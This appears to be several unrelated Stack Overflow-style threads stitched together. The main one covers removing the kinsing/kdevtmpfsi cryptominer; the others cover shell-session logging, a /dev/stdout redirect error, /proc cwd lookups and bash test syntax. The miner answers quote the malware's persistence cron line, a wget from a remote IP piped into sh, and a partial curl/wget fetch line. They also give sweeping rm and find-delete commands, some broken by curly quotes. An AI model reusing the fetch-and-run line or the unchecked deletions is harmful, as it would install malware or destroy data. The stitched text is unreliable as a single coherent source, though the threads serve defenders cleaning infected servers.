I'm trying to monitor command execution on a shell.
I need to separate the input command, for example:
input:
ls -l /
output:
total 76
lrwxrwxrwx 1 root root 7 Aug 11 10:25 bin -> usr/bin
drwxr-xr-x 3 root root 4096 Aug 11 11:18 boot
drwxr-xr-x 17 root root 3200 Oct 11 11:10 dev
...
Also, I want to do the same if I open another shell, for example, after connection through ssh to another server.
I've been using script command to do this and it works just fine!
It logs all command input and output even if the shell changes (through ssh, or entering a msfconsole, for example).
Nevertheless, I found two main issues:
For my project, I need to separate (using a decoder) each command from the rest, also it would be awesome to be able to separate command input and output, for example:
cmd1. pwd ---> /var/
cmd2. echo "hello world" ---> "hello world"
....
Sometimes the script command could generate an output with garbage due to shell special characters (for colors, for example) which I would like to filter out.
So I've been thinking about this and I guess I could create a simple script that read from the file written by "script" command and processed the data.
Nevertheless, I'm not sure about what could be the best approach to do this.
I'm evaluating different solutions and I would like to know different proposals from the community.
Maybe I'm losing something and you know a better tool rather than script command or have some idea I've not considered.
Best regards,
A useful util for distinguishing stdout from stderr is annotate-output, (install the "devscripts" package), which sends stderr and stdin both to stdout along with helpful little prefixes. For example, let's try counting characters of a file that exists, plus one that doesn't exist:
annotate-output wc -c /bin/bash /bin/nosuchshell
Output:
00:29:06 I: Started wc -c /bin/bash /bin/nosuchshell
00:29:06 E: wc: /bin/nosuchshell: No such file or directory
00:29:06 O: 1099016 /bin/bash
00:29:06 O: 1099016 total
00:29:06 I: Finished with exitcode 1
That output could be parsed separately using sed, awk, or even a tee and a few greps.
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 1 year ago.
The community reviewed whether to reopen this question 7 months ago and left it closed:
Original close reason(s) were not resolved
Improve this question
We are using an EC2(Ubuntu) amazon instance for running Apache.Recently we noticed that there is a process using the entire CPU.
We removed it using the help of the following procedure
[root#hadoop002 tmp]# systemctl status 25177
● session-5772.scope - Session 5772 of user root
Loaded: loaded (/run/systemd/system/session-5772.scope; static; vendor preset: disabled)
Drop-In: /run/systemd/system/session-5772.scope.d
└─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions\x2eservice.conf, 50-Description.conf, 50-SendSIGHUP.conf, 50-Slice.conf, 50-TasksMax.conf
Active: active (abandoned) since Wed 2020-01-22 16:06:01 CST; 1h 21min ago
CGroup: /user.slice/user-0.slice/session-5772.scope
├─19331 /var/tmp/kinsing
└─25177 /tmp/kdevtmpfsi
Jan 22 16:06:17 hadoop002 crontab[19353]: (root) REPLACE (root)
Jan 22 16:06:17 hadoop002 crontab[19354]: (root) LIST (root)
Jan 22 16:06:17 hadoop002 crontab[19366]: (root) LIST (root)
Jan 22 16:06:17 hadoop002 crontab[19374]: (root) REPLACE (root)
Jan 22 16:06:17 hadoop002 crontab[19375]: (root) LIST (root)
Jan 22 16:06:17 hadoop002 crontab[19383]: (root) REPLACE (root)
Jan 22 16:06:17 hadoop002 crontab[19389]: (root) REPLACE (root)
Jan 22 16:06:17 hadoop002 crontab[19390]: (root) LIST (root)
Jan 22 16:06:17 hadoop002 crontab[19392]: (root) REPLACE (root)
Jan 22 16:06:17 hadoop002 crontab[19393]: (root) LIST (root)
[root#hadoop002 tmp]# ps -ef|grep kinsing
root 19331 1 0 16:06 ? 00:00:04 /var/tmp/kinsing
root 25190 23274 0 17:27 pts/0 00:00:00 grep --color=auto kinsing
[root#hadoop002 tmp]# ps -ef|grep kdevtmpfsi
root 25177 1 99 17:27 ? 00:01:47 /tmp/kdevtmpfsi
root 25197 23274 0 17:28 pts/0 00:00:00 grep --color=auto kdevtmpfsi
[root#hadoop002 tmp]# kill -9 19331
[root#hadoop002 tmp]# kill -9 25177
[root#hadoop002 tmp]# rm -rf kdevtmpfsi
[root#hadoop002 tmp]# cd /var/tmp/
[root#hadoop002 tmp]# ll
total 16692
-rw-r--r-- 1 root root 0 Jan 13 19:45 aliyun_assist_update.lock
-rwxr-xr-x 1 root root 13176 Dec 20 02:14 for
-rwxr-xr-x 1 root root 17072128 Jan 19 17:43 kinsing
drwx------ 3 root root 4096 Jan 13 19:50 systemd-private-f3342ea6023044bda27f0261d2582ea3-chronyd.service-O7aPIg
[root#hadoop002 tmp]# rm -rf kinsing
But after a few minutes, It again started automatically. Anyone know how to fix this?
I had the same issue with Laravel in Centos 8, This is the steps I followed to remove the malware and patch the system.
Removing the malware from system steps:
Step 1:
Remove the malware:
Kill the two process (kdevtmpfsi and kinsing -They can be in the same name but with random characters at the end-) using htop or any other process manager.
htop F3 to search services kdevtmpfsi And kinsing
Use the following to find and delete the files:
# find / -iname kdevtmpfsi* -exec rm -fv {} \;
# find / -iname kinsing* -exec rm -fv {} \;
The output should look like:
removed '/tmp/kdevtmpfsi962782589'
removed '/tmp/kdevtmpfsi'
removed '/tmp/kinsing'
removed '/tmp/kinsing_oA1GECLm'
Step 2:
Check for a cron job:
check if there is a cron job that would reinitialized the malware.
I found mine in: /var/spool/cron/apache >
UBUNTU /var/spool/cron/crontabs/www-data
It included the following :
* * * * * wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1
Step 3:
Make new files and make them readonly:
# touch /tmp/kdevtmpfsi && touch /tmp/kinsing
# echo "kdevtmpfsi is fine now" > /tmp/kdevtmpfsi
# echo "kinsing is fine now" > /tmp/kinsing
# chmod 0444 /tmp/kdevtmpfsi
# chmod 0444 /tmp/kinsing
Patching Laravel project:
Step 1:
Turn off APP_DEBUG:
make sure that the APP_DEBUG attribute is false in .env because that's how the vulnerability gets access.
Step 2:
Update ignition:
Update ignition to a version higher than 2.5.1 to make sure the vulnerability is patched.
run the following in your project folder:
$ composer update facade/ignition
The solution mentioned here worked for us. You basically create the files the miner uses, without any rights, so the miner cannot create and use them.
https://github.com/docker-library/redis/issues/217
touch /tmp/kdevtmpfsi && touch /var/tmp/kinsing
echo "everything is good here" > /tmp/kdevtmpfsi
echo "everything is good here" > /var/tmp/kinsing
touch /tmp/zzz
echo "everything is good here" > /tmp/zzz
chmod go-rwx /var/tmp
chmod 1777 /tmp
I face to face with it after i installed and run the Flink Cluster.
Seem like we are got a attack by a malware, it trying to use our server's cpu to run the program to mine the coin.
My solution is following steps:
Kill the program is running first:
Run htop and then push F9 to kill program. We have to kill kdevtmpfsi and kinsing as well.
Delete malware file which is will be run and using the entire CPU
(With my centos 7)
find / -iname kdevtmpfsi -exec rm -fv {} \;
find / -iname kinsing -exec rm -fv {} \;
The result should be:
/tmp/kdevtmpfsi is removed
/var/tmp/kinsing is removed
Create a file with same name:
touch /tmp/kdevtmpfsi && touch /var/tmp/kinsing
echo "kdevtmpfsi is fine now" > /tmp/kdevtmpfsi
echo "kinsing is fine now" > /var/tmp/kinsing
Now make two files is read-only with following command:
chattr +i /tmp/kdevtmpfsi
chattr +i /var/tmp/kinsing
** You should be reboot your server. If its problem is in a remote server, and you are connecting to it with a specify port, you can change to ssh port to increase security!
I've struggled with this miner for few days and in my case it was the php-fpm:9000 port exposed.
I guess it possible to inject some code remotly this way.
So if you use docker with php-fpm, do NOT run your container this way:
docker run -v /www:/var/www -p 9000:9000 php:7.4
Remove the port mapping: -p 9000:9000.
Don't forget to re-build & restart your containers.
More details here:
https://github.com/laradock/laradock/issues/2451#issuecomment-577722571
I also was affected by this malware and I was not using Docker or running the PHPUnit vulnerability. I found this post:
https://www.ambionics.io/blog/laravel-debug-rce
which describes there was a vulnerability in facade/ignition < 2.5.2 when using Laravel in Debug mode.
Extract of Laravel .env file:
...
APP_DEBUG=true
...
After updating facade/ignition with Composer to a version > 2.5.1 and stopping the malware (steps described in the other answers), it did not came back.
Extract of Laravel composer.json file
...
"facade/ignition": "^2.5.1",
...
...then run command
composer update facade/ignition
The other answer here is good, and you should do everything mentioned there. But, if the thing keeps coming back, and/or you aren't actually using Docker, you probably have an unpatched RCE vulnerability in phpUnit. The details are here:
https://www.sourceclear.com/vulnerability-database/security/remote-code-execution-rce/php/sid-4487
Our situation was:
Docker is not being used at all.
We had removed all files related to the miner.
We had locked things down using the above touch and chmod commands.
The damn thing kept trying to run at seemingly random times.
After you've locked things down with the touch/chmod changes, it can't actually DO anything, but it's still annoying, and that phpUnit vulnerability is a HUGE hole that needs plugging anyway.
Hope this helps.
Ok I've been facing the same issue as a lot of you. But my process was running as a postgres user. I suspect it was because I had opened up all incoming connections.
Yeah sure, my bad.
After trying all the solutions above none seemed to fix it permanently. It just kept spawning again with a slightly different name. No luck at all really.
First - protect agaisnt any other connections.
First things first, restrict connections in the postgres config file.
Usually found here. /etc/postgresql/12/main/postgresql.conf
Create a script to kill and remove kdevtmpfsi
Then create a new bash script in a location of your choosing..
nano kill.sh
Populate the file with the below.
#!/bin/bash
kill $(pgrep kdevtmp)
kill $(pgrep kinsing)
find / -iname kdevtmpfsi -exec rm -fv {} \;
find / -iname kinsing -exec rm -fv {} \;
rm /tmp/kdevtmp*
rm /tmp/kinsing*
press ctrl + c to exit
kill will kill the process and the next 4 commands should delete the file(s).
We need to make the file executable with
chmod +x kill.sh
Set it to run on schedule
Ok great now if we set this up as a cron job to run every minute it should help solve the issue. (not an elegant solution but it works)
sudo crontab -e
The above command opens the crontab, a place were we can define scheduled tasks to run at set intervals.
Append this to the end.
* * * * * sh {absolutepath}kill.sh > /tmp/kill.log
ie
* * * * * sh /home/user/kill.sh > /tmp/kill.log
What the crontab entry does
* * * * * sets the time - this means every minute
sh /home/user/kill.sh runs the kill script
&
> /tmp/kill.log writes any output to file.
I know this is not a good solution. But it works.
It appears there are many vectors of attack in which this malware can be loaded onto the server. In my case the malware got to the machine through the docker:
# locate kdevtmpfsi
/var/lib/docker/overlay2/17be841bd29c[..]/diff/tmp/kdevtmpfsi
/var/lib/docker/overlay2/17be841bd29c[..]/merged/tmp/kdevtmpfsi
Docker by default exposes containers ports publicly, which is rather unfortunate. To fix it you will need to remove the malware and patch docker:
# First, stop all docker containers
$ docker stop $(docker ps -aq)
# Prune all images just for a good measure
$ docker system prune
# Kill current malware process
$ ps aux | grep kdevtmpfsi
70 21686 393 29.3 2873416 2402832 ? Ssl 22:01 19:22 /tmp/kdevtmpfsi116044092
$ kill -9 21686
# Remove any files with the name kdevtmpfsi
$ find / -iname kdevtmpfsi* -exec rm -fv {} \;
# You might need to repeat the last two commands couple times just in case
# Stop exposing docker ports with the use of IP tables
$ iptables -I DOCKER-USER -i eth0 -j DROP
$ iptables -I DOCKER-USER -m state --state RELATED,ESTABLISHED -j ACCEPT
# If no new kdevtmpfsi processes appear you should be good.
Malware is adapting and many of the solutions here do not work anymore. Experiment with few approaches till you figure our what was the vector of attack in your case.
I faced that issue and I solved it by running the following commands:
first login as a root an delete the user that has the process, in your case is www-data
sudo deluser --remove-home www-data
second kill the process of the user
killall --user www-data
I'm also facing the same issue in Ubuntu 18.04.5 LTS after deleting the malware files /tmp/kinsing & /tmp/kdevtmpfsi its generating automatically.
Fixing this issue created the bash script & set the cronjobs to run.
My solution is following steps:
Kill the program is running first:
Run htop and then push F9 to kill program. We have to kill kdevtmpfsi and kinsing as well.
Delete malware file which is will be run and using the entire CPU
#!/bin/bash
# kinsing deleteing here
PID=$(pidof kinsing)
echo "$PID"
kill -9 $PID
# /tmp/kinsing deleteing here (Some times it will run /tmp path)
PID=$(pidof /tmp/kinsing)
echo "$PID"
kill -9 $PID
# kdevtmpfsi deleteing here
PID=$(pidof kdevtmpfsi)
echo "$PID"
kill -9 $PID
# /tmp/kdevtmpfsi deleteing here (Some times it will run /tmp path)
PID=$(pidof /tmp/kdevtmpfsi)
echo "$PID"
kill -9 $PID
# Delete malware files
find / -iname kdevtmpfsi -exec rm -fv {} \;
find / -iname kinsing -exec rm -fv {} \;
Save this one file (some-script.sh) configure the cronjobs for this
Step 1: Open crontab (the cron editor) with the following command.
$ crontab -e
Step 2: If this is your first time accessing crontab, your system will likely ask you which editor you'd prefer to use. In this example, we'll go with nano (type 1 and then Enter) since it's the easiest to understand.
$ crontab -e
no crontab for linuxconfig - using an empty one
Select an editor. To change later, run 'select-editor'.
1. /bin/nano <---- easiest
2. /usr/bin/vim.basic
3. /usr/bin/vim.tiny
4. /bin/ed
Choose 1-4 [1]:
Step 3: Make a new line at the bottom of this file and insert the following code. Of course, replace our example script with the command or script you wish to execute, but keep the */5 * * * * part as that is what tells cron to execute our job every 5 minutes.
*/5 * * * * /path/to/some-script.sh
Step 4: Exit this file and save changes. To do that in nano, you'd need to press Ctrl + X, Y, and then Enter.
That's all there is to it. Scheduling jobs in cron will run Every 5 Mins.
#!/bin/bash
kill $(pgrep kdevtmp)
kill $(pgrep kinsing)
kill $(pgrep dbused)
find / -iname kdevtmpfsi -exec rm -fv {} \;
find / -iname kinsing -exec rm -fv {} \;
find / -iname dbused -exec rm -fv {} \;
rm /tmp/kdevtmp*
rm /tmp/kinsing*
rm /tmp/dbused*
ps -ef | grep “givemexyz” | awk ‘{print $2}’| xargs pkill
ps -ef | grep “dbuse” | awk ‘{print $2}’| xargs pkill
rm -rf /bin/bprofr /bin/sysdr /bin/crondr /bin/initdr /usr/bin/bprofr /usr/bin/sysdr /usr/bin/crondr /usr/bin/initdr /tmp/dbused /tmp/dbusex /tmp/xms /tmp/x86_64 /tmp/i686 /tmp/go /tmp/x64b /tmp/x32b /tmp/2start.jpg
and
crontab -u gitlab -e
delete * * * * * (curl -fsSL $url/xms||wget -q -O-
I found all the above solutions helpful but all of them are seems the temporary solution as we need to monitor the instance and if we notice any malicious activity then do the same process again.
I have come across this virus around 1 month back and applied all the solutions above which works fine for the limited period after that, it will come again.
Even I didn't install docker in the system so docker open API port was not an issue.
But there are some open-source software which are the open gate for kinsing.
PhpMailer and Solr have some Remote Code Exec vulnerability cause the whole issue.
The easy solution is to upgrade your Solr version to 8.5.1 and there one more thing you can set as security which will 100% remove the virus and it will be permanent.
Here is the full explanation: https://github.com/amulcse/solr-kinsing-malware
in my case it run from www-data user:
helps this:
sudo crontab -u www-data -e
remove this line(cron job):
* * * * * wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1
So, at the platform I worked at we had the same problem yep, on an ECS2 instance.
But our culprit was Redis, someone forgot to set a password on the day before and by morning we woke up to our dashboard notifying us about weird spikes of CPU usage.
If you want to verify that the malware is still running, run
ps aux | grep -v grep | grep 'kinsing|kdevtmpfsi'
If it outputs anything it means it is executing in some form.
Our solution was:
In our Redis database we deleted a bunch of keys called "backup1" "backup2", "backup3", "backup4".
Then we ssh to the server and used
sudo su root
ps aux | grep -v grep | grep 'kinsing\|kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 %
rm -dr /tmp/kdevtmpfsi
rm -dr /var/tmp/kdevtmpfsi
We also managed to download the script that was being scheduled to execute all the time through Redis and crontab, I assume it is what reinstalled the damned malware over and over again while we tried to remove it, its quite well made, it also kills other miners that it detects, besides trying to disable SELinux and apparmor and some other important stuff. Really amazing stuff.
I've pasted it here:
https://pastebin.com/jiifURXy
In some cases this may be due to a security breach found in a Laravel <= v8.4.2 on package facade/ignition. CVE-2021-3129
Here we have an article that explains how the malware works: Laravel <= v8.4.2 debug mode: Remote code execution (CVE-2021-3129)
This problem was resolved in version 2.4.2 of this package. (facade/ignition)
If I were in your place, I would consider your instance as compromised and create a new one. In the tests I did, the malware changes places and adapts to changes made to the system in an attempt to stop it.
Maybe this would be useful for somebody.
I've found some other entries of kinsing/kdevtmpfsi:
/etc/kinsing
/usr/lib/systemd/system/bot.service
In bot.service:
ExecStart=/etc/kinsing
I've just followed instructions from this tread, deleted both files, rebooted server.
Hope it will help for somebody. I've spent all day trying to solve it.
I found this solution to temporary stop the process from running (not using Docker/Redis, so the hole is most likely in phpunit):
/bin/setfacl -m u:www-data:--- /tmp/kinsing
/bin/setfacl -m u:www-data:--- /tmp/kdevtmpfsi
It will prevent user www-data (who, in my case, was running the process) from executing the script.
Also, you will most likely have a cronjob added under user www-data - remove it and run service cron restart!
Remember, that's a temp fix/hack. You must update the vulnerable software to permanently remove this thread!
If you tried all of the methods above but still the virus still shows up, maybe in a new name, you should check the opened ports of the server and that's where the malware got into your server.
For security, you should:
start the firewall.
if you need to visit some ports of the remote server, use Port Forwarding technique.
This will make your server be safe, and no more kdevtmpfsi.
For AWS users, remove allowing all ports(0.0.0.0/0) as outbound in instance security.
I recently upgraded from CentOS 5.8 (with GNU bash 3.2.25) to CentOS 6.5 (with GNU bash 4.1.2). A command that used to work with CentOS 5.8 no longer works with CentOS 6.5. It is a silly example with an easy workaround, but I am trying to understand what is going on underneath the bash hood that is causing the different behavior. Maybe it is a new bug in bash 4.1.2 or an old bug that was fixed and the new behavior is expected?
CentOS 5.8:
(echo "hi" > /dev/stdout) > test.txt
echo $?
0
cat test.txt
hi
CentOS 6.5:
(echo "hi" > /dev/stdout) > test.txt
-bash: /dev/stdout: Not a directory
echo $?
1
Update: It doesn't look like this is problem related to CentOS version. I have another CentOS 6.5 machine where the command works. I have eliminated any environment variables as the culprit. Any ideas?
On all the machines these commands gives the same output:
ls -ld /dev/stdout
lrwxrwxrwx 1 root root 15 Apr 30 13:30 /dev/stdout -> /proc/self/fd/1
ls -lL /dev/stdout
crw--w---- 1 user1 tty 136, 0 Oct 28 23:21 /dev/stdout
Another Update: It seems the sub-shell is inheriting the redirected stdout of the parent shell. The is not too surprising I guess, but still why does it work on one machine, but fail on the other machine when they are running the same bash version?
On the working machine:
((ls -la /dev/stdout; ls -la /proc/self/fd/1) >/dev/stdout) > test.txt
cat test.txt
lrwxrwxrwx 1 root root 15 Aug 13 08:14 /dev/stdout -> /proc/self/fd/1
l-wx------ 1 user1 aladdin 64 Oct 29 06:54 /proc/self/fd/1 -> /home/user1/test.txt
I think Yu Huang is right, redirecting to /tmp works on both machines. Both machines are using isilon NAS for the /home mount, but probably one has slightly different filesystem version or configuration that caused the error. In conclusion, redirecting to /dev/stdout should be avoided unless you know the parent process will not redirecting it.
UPDATE: This problem arose after upgrade to NFS v4 from v3. After downgrading back to v3 this behavior went away.
Good morning, user1999165, :)
I suspect it's related to the underlying filesystem. On the same machine, try:
(echo "hi" > /dev/stdout) > /tmp/test.txt
/tmp/ should be linux native (ext3 or something) filesystem
On many Linux systems, /dev/stdout is an alias (link or similar) for file descriptor 1 of the current process. When you look at it from C, then the global stdout is connected to file descriptor 1.
That means echo foo > /dev/stdout is the same as echo foo 1>&1 or a redirect of a file descriptor to itself. I wouldn't expect this to work since the semantics are "close descriptor to redirect and then clone the new target". So to make it work, there must be special code which notices that the two file descriptors are actually the same and which skips the "close" step.
My guess is that on the system where it fails, BASH isn't able to figure out /dev/stdout == fd1 and actually closes it. The error message is weird, though. OTOH, I don't know any other common error which would fit better.
Note: I tried to replicate your problem on Kubuntu 14.04 with BASH 4.3.11 and here, the redirect works (i.e. I don't get an error). Maybe it's a bug in BASH 4.1 which was fixed, since.
I was seeing issues writing piped stdin input to AWS EFS (NFSV4) that paralleled this issue. (Using Centos 6.8 so unfortunately cannot upgrade bash to 4.2).
I asked AWS support about this, here's their response --
This problem is not related to EFS itself, the problem here is with bash. This issue was fixed in bash 4.2 or later in RHEL.
To avoid this problem, please, try to create a file handle before running the echo command
within a subshell, after that the same file handler can be used as a redirect. Like the below example:
exec 5> test.txt; (echo "hi" >&5); cat test.txt
hi
Is there a way to know where command typed? I mean when I list the running processes, there are many processes with full path name, but it does not indicated where these process started.
Think about that there is a java application under /tmp/AppJava.jar It could be executed under /home/appuser or /home/test by manullay or other script.
Is there a way how to find java -jar /tmp/AppJava.jar executed under which directory?
Yes you can.
You need to find the PID of the process, and then
ls -l /proc/$PID/cwd
For example, my shell has current directory /home/igor:
$ ls -l /proc/$$/cwd
lrwxrwxrwx 1 igor igor 0 nov 11 21:49 /proc/6569/cwd -> /home/igor
The PID of the process you can find using ps:
$ ps aux | grep java.*AppJava.jar
This line is inside my /etc/rc.sysinit file on linux:
[ -r /proc/mdstat -a -r /dev/md/md-device-map ] && /sbin/mdadm -IRs
I'm not so much interested in what it actually accomplishes as opposed to how the syntax works.
It tests if the files /proc/mdstat and /dev/md/md-device-map exists and are readable (-r), and if yes executes /sbin/mdadm -IRs.
The square brackets are an alternative name of the program test (or a Bash replacement thereof), which can test for lots of stuff, such as existence of files. The -a is a logical "and".
For more details, see "CONDITIONAL EXPRESSIONS" in man bash.
The [ is actually a command name itself, that is equivalent to the test command. So, use man test to find out what -r means.
Depending on your system, you may find [ in /usr/bin:
$ ls -l /usr/bin/[
-rwxr-xr-x 1 root root 37000 Oct 5 2011 /usr/bin/[
or it could be a symlink:
$ ls -l /usr/bin/[
-rwxr-xr-x 1 root root 4 Oct 5 2011 /usr/bin/[ -> test
Some shells also have [ as a built-in command (and some even have [[ which provides additional options). As with most built-in commands though, you'll also find an implementation in the filesystem.
This means :
if /proc/mdstat is readable by you and /dev/md/md-device-map is readable by you, then run /sbin/mdadm -IRs
See help test
NOTE
[[ is a bash keyword similar to (but more powerful than) the [ command. See http://mywiki.wooledge.org/BashFAQ/031 and http://mywiki.wooledge.org/BashGuide/TestsAndConditionals
Unless you're writing for POSIX sh, we recommend [[.